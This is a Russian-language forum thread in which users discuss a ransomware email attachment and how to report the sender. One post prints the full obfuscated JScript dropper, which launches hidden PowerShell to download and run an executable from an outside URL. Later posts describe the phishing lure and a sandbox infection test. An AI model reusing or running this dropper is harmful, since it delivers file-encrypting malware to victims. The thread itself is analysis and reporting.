Здравствуйте, гость ( Вход | Регистрация )

 
Ответить в эту темуОткрыть новую тему
> Вирусы шифровальщики, Как наказать ублюдков? :))
Mirage
сообщение 26.1.2017, 11:45
Сообщение #1


*******

Группа: Пользователи
Наличность: 0
Из: Иваново
Пользователь №: 13.089
Возраст: 35



Прислали письмо с вложением zip файла в котором был js разобрав который вытащил сайт с которого заливается тело исполняемого файла вируса.
Чисто ради практического интереса - можно ли куда то настучать что "вон тот гомосек рассылает вон такие вот пакости!"?
Если у кого есть желание пощикотать пятую точку могу скинуть текст исполняемого скрипта закатчика. Дальше я не полез ибо хер его знает что там. (IMG:style_emoticons/default/rolleyes.gif)


--------------------
Изображение
Пользователь в офлайнеDelete PostОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Narayan
сообщение 26.1.2017, 12:36
Сообщение #2


**********

Гарант UoKit
Сообщений: 2.847
Регистрация: 28.3.2007
Группа: Супермодераторы
Наличность: 15545
Пользователь №: 9.591



В горячую линию мвд звони)


--------------------
Пользователь в офлайнеDelete PostОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Mirage
сообщение 26.1.2017, 12:52
Сообщение #3


*******

Группа: Пользователи
Наличность: 0
Из: Иваново
Пользователь №: 13.089
Возраст: 35



Боюсь что там они скажут "Нука че тут за ссылко?" и тыкнут...


--------------------
Изображение
Пользователь в офлайнеDelete PostОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Juzzver
сообщение 26.1.2017, 14:55
Сообщение #4


**********

Модератор RunUO
Сообщений: 3.425
Регистрация: 1.11.2008
Группа: Супермодераторы
Наличность: 22565
Из: Северная Корея
Пользователь №: 11.273



JS не умеет запускать исполняемые файлы. Максимум через ActiveXObject, который работает только в IE, и то с доп. разрешением, и конечно же в случае со скаченным файлом, нужно четко знать куда он скачивается. Но если это стандартная директория с загрузками, то не проблема.

Скорее всего там банально что-то типа:
Код
<a href="C:\Program Files\Notepad++\notepad++.exe">Блокнот</a>

Ну и то, чтобы это запустилось, браузер затребует разрешения на запуск.

Даже если каким то образом приложение будет запущено, то потребуется еще подтверждение от винды.


--------------------
Пользователь в офлайнеDelete PostОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Destruction
сообщение 26.1.2017, 15:01
Сообщение #5


**********

Группа: Администраторы
Наличность: 4
Пользователь №: 1.833



Цитата(Juzzver @ 26.1.2017, 14:55) *

JS не умеет запускать исполняемые файлы. Максимум через ActiveXObject, который работает только в IE, и то с доп. разрешением, и конечно же в случае со скаченным файлом, нужно четко знать куда он скачивается. Но если это стандартная директория с загрузками, то не проблема.

Скорее всего там банально что-то типа:
Код
<a href="C:\Program Files\Notepad++\notepad++.exe">Блокнот</a>

Ну и то, чтобы это запустилось, браузер затребует разрешения на запуск.

Даже если каким то образом приложение будет запущено, то потребуется еще подтверждение от винды.

Ну так "Далее, Далее, Далее, Готово". Именно так большая часть вирусов и попадает на компьютеры.

Кроме того, никто не отменял наличие уязвимостей в браузере.


--------------------
Discord: tatikom
Пользователь в офлайнеDelete PostОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Mirage
сообщение 26.1.2017, 16:08
Сообщение #6


*******

Группа: Пользователи
Наличность: 0
Из: Иваново
Пользователь №: 13.089
Возраст: 35



хз как тут в спойлер кидать, Вот текст скрипта в общем:

Code
Код
var FkMwWBV = ''+
'NkN'+
'AfNCNH'+
'sNGNiN.NSheNlN'+
'lNENxeNc'+
'Nu'+
'tNeN('+
'N"'+
'N'+
'CN'+
'mN'+
'D'+
'N.exNeN"N,N "/cN NpNiNnNg l'+
'oNcalN'+
'hoNsNtN N&N N'+
'pNoNwNeNrNsNheN'+
'lNlN.NeNxeN '+
'-NeNxeNc'+
'NuNtio'+
'Nnp'+
'NolNiN'+
'cy b'+
'NyNpa'+
'N'+
's'+
'Ns N-NnN'+
'o'+
'Np'+
'rNof'+
'iNleN N-NwNiNnN'+
'do'+
'wNsNt'+
'NyNleN hNiNdN'+
'de'+
'nN (newN-'+
'oNbN'+
'jectN Nsy'+
'NsN'+
'tNemN.'+
'Nn'+
'NetN'+
'.w'+
'N'+
'eNb'+
'clNiNenNtN'+
')'+
'.NdowNnlNoaNdNfNile(\''+
'N'+
'h'+
'tNtNp://j'+
'Ne'+
'N'+
'fN'+
'freNyN'+
'aNlNaNn'+
'jonNeNs.NcNom/FTN'+
'LOM/iNma'+
'Ng'+
'es/dhlN_'+
'pN'+
'aNr'+
'cNeNl.php\',\'N%ApN'+
'PNdaN'+
'TN'+
'aN%'+
'U'+
'NINSN'+
'3'+
'8N.eNxe\')N; NSt'+
'ar'+
'NTN-Npr'+
'NONCNeSNs \'N%N'+
'APNpN'+
'dNANtN'+
'a'+
'N%NU'+
'ISN38N.eNxe\'"'+
'N,'+
' N"N"N,N'+
' '+
'"NopeNnN'+
'",N N0);';
var oQiuhFV = "HQKQLM\\sQ"+
"oftWQa"+
"Qre\\MQiQC"+
"R"+
"Qo"+
"QSO"+
"QfT\\WIQnQDowsQ QnT\\cQuQ"+
"RQr"+
"QE"+
"NQTQv"+
"eQrQSQiQ"+
"oN\\sQY"+
"QsQtQemr"+
"QOQoT";
oQiuhFV = oQiuhFV.replace(/\Q/g, "");
var OzjGFKuQ = new ActiveXObject("wscRipt.shelL");
var OdbiWJry = OzjGFKuQ.RegRead(oQiuhFV).charAt(378936845/75787369).toUpperCase();
var kAfCHsGi = new ActiveXObject("sHeLl.aPplicatIOn");
(new Function(FkMwWBV.replace(RegExp(OdbiWJry, "g"), "")))();

Мы так баловались на заре скриптописания - объявить переменные что то сложить что то убрать и по хорошему комп периодически будет выключаться. А по плохому будет удаленный доступ до клиента.

У этого кхмдака на страничке "зашифрованной" какие то помощь нуждающимся.

Edit Destruction: Добавил спойлер.


--------------------
Изображение
Пользователь в офлайнеDelete PostОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Juzzver
сообщение 26.1.2017, 22:08
Сообщение #7


**********

Модератор RunUO
Сообщений: 3.425
Регистрация: 1.11.2008
Группа: Супермодераторы
Наличность: 22565
Из: Северная Корея
Пользователь №: 11.273



Прям целая криптография (IMG:style_emoticons/default/biggrin.gif)
Ну как я понимаю, данный скрипт будет работать только в эксплоере. Зашифрованная ссылка на файл, который якобы должен запускаться после считывания реестра. Правда тут я не понимаю, как скаченный файл попадает в регистр... Возможно опять таки за счет ActiveXObject элемента, который эксплоер может где то и прописывает.

Детально лень расшифровывать, но в целом интересно. Кто-то да и попадётся на подобное (IMG:style_emoticons/default/smile.gif)

а хотя... скрипт же в ручную на системе запускается, тогда и браузер то толком нужен лишь для того, чтобы скачался файл. Так уже опаснее)


--------------------
Пользователь в офлайнеDelete PostОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Soteric
сообщение 26.1.2017, 22:20
Сообщение #8


********

Master
Сообщений: 1.377
Регистрация: 7.8.2006
Группа: Пользователи
Наличность: 3227
Пользователь №: 7.166



Цитата(Mirage @ 26.1.2017, 11:45) *

Прислали письмо с вложением zip файла в котором был js разобрав который вытащил сайт с которого заливается тело исполняемого файла вируса.
Чисто ради практического интереса - можно ли куда то настучать что "вон тот гомосек рассылает вон такие вот пакости!"?
Если у кого есть желание пощикотать пятую точку могу скинуть текст исполняемого скрипта закатчика. Дальше я не полез ибо хер его знает что там. (IMG:style_emoticons/default/rolleyes.gif)

Как минимум, через whois можно узнать хостера и написать ему жалобу. И там уже если это хакнутый сайт, то его полечат. Если это сайт самих хацкеров, то выгонят с хостинга.
Пользователь в офлайнеDelete PostОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Mirage
сообщение 26.1.2017, 22:55
Сообщение #9


*******

Группа: Пользователи
Наличность: 0
Из: Иваново
Пользователь №: 13.089
Возраст: 35



Цитата(Juzzver @ 26.1.2017, 22:08) *
)

Похеру браузер. Файл скачивается фоном (неосознанно) в темповую папку. Смысл штуки следующий. На почту приходит письмо от условно Григория Васильева который является "Вашим новым куратором/отправил Вам финансовую отчетность/Справку о доходах/Акт выполненных работ на соогласование". Как правило приходит либо архив zip либо как в данном случае было написано что файл лежит на корпоративном облачном хранилище и ссылка на архив. Зип файл открывается в любом современном браузере. Если работать с почтовой программой то кидает во временную папку и опять таки открывается встроенным архиватором либо раром либо 7zip. А уж тыкнуть в файл без иконки (он же в архиве) Документы проверить/Договор поставки/Акт на согласование - сам бог велел. А дальше уже по накатанному - подключился, качнул, запустил, шифронул.

ЗЫ на 2 компах проверял. На котором стоял 8 ESET SS с сегодняшними базами файл даже из архива не выполз - завизжала система. Но опять таки кто остановит упрямого бухгалтера которому НАДО СУКА открыть этот меговажный документ во что бы то нистало. На той же версии нода но с базами от осени 2016 года файл спокойно запустился. Но отсутствие интернета на машине не дало произвести какие либо глобальные вредодействия. Завтра буду подключать к выделенной для теста линии и тестить. Опишу степень полярного лиса.


--------------------
Изображение
Пользователь в офлайнеDelete PostОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Mirage
сообщение 30.1.2017, 9:57
Сообщение #10


*******

Группа: Пользователи
Наличность: 0
Из: Иваново
Пользователь №: 13.089
Возраст: 35



В общем если заранее подготовиться то не так уж все и страшно.
Берем компьютер с чистой виндой. Два пользователя - User - права "Пользователь" и Root - права "Администратор". Оба на разных паролях. UAC включена. Родной фаервол отключен. Установлен ESET SS с не очень свежими базами. Создаем папку с несколькими файлами. 1.doc, 2.xls, 3.jpg, 4.pdf, 5.rar. Кладем копии папок в "Мои документы" обоим пользователям.
Заходим в User. Подрубаем интернет любого типа (я взял для теста yota свисток что бы не положить сеть на тестах (IMG:style_emoticons/default/smile.gif) ), переходим по ссылке на архив который прислали (у меня файл был заранее скачал) и запускаем Документ.js
Компьютер пару минут пыхтит затем пару раз поморгав запускает эксплорер с предупреждением что компьютер заблокирован и надо платить бабки за восстановление. В параллель начинает вылезать окно UAC с замечанием что что то не так и кто то пытается пролезть в папку систем и куда то еще а прав то не хватает. Окно на закрытие не реагирует - программа в цикле пытается запустить файл пока не убивается в ручную через диспетчер задач. Файлы в документах юзера благополучно запаролены и не читаемы. Сам исполняемый файл вируса падает в папку c:\Uses\User\AppDate\RoamingUIS38.exe.

Если лень копаться то вытаскиваем все документы (живые) из папки Root/Documents и сносим всю системы. Документы в запароленных "Администратором" папках вирус не тронул. После ради прикола тыкнул в файл вируса "Сканировать программой ESET SS" Венда запросила доступ на сканирование администратору системы. После этого документы рута благополучно скисли (IMG:style_emoticons/default/smile.gif) Так что антивирус даже противопоказан.


--------------------
Изображение
Пользователь в офлайнеDelete PostОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения

Ответить в эту темуОткрыть новую тему
3 чел. читают эту тему (гостей: 3, скрытых пользователей: 0)
Пользователей: 0

 

- Текстовая версия | Версия для КПК Сейчас: 28.3.2024, 20:47
Designed by Nickostyle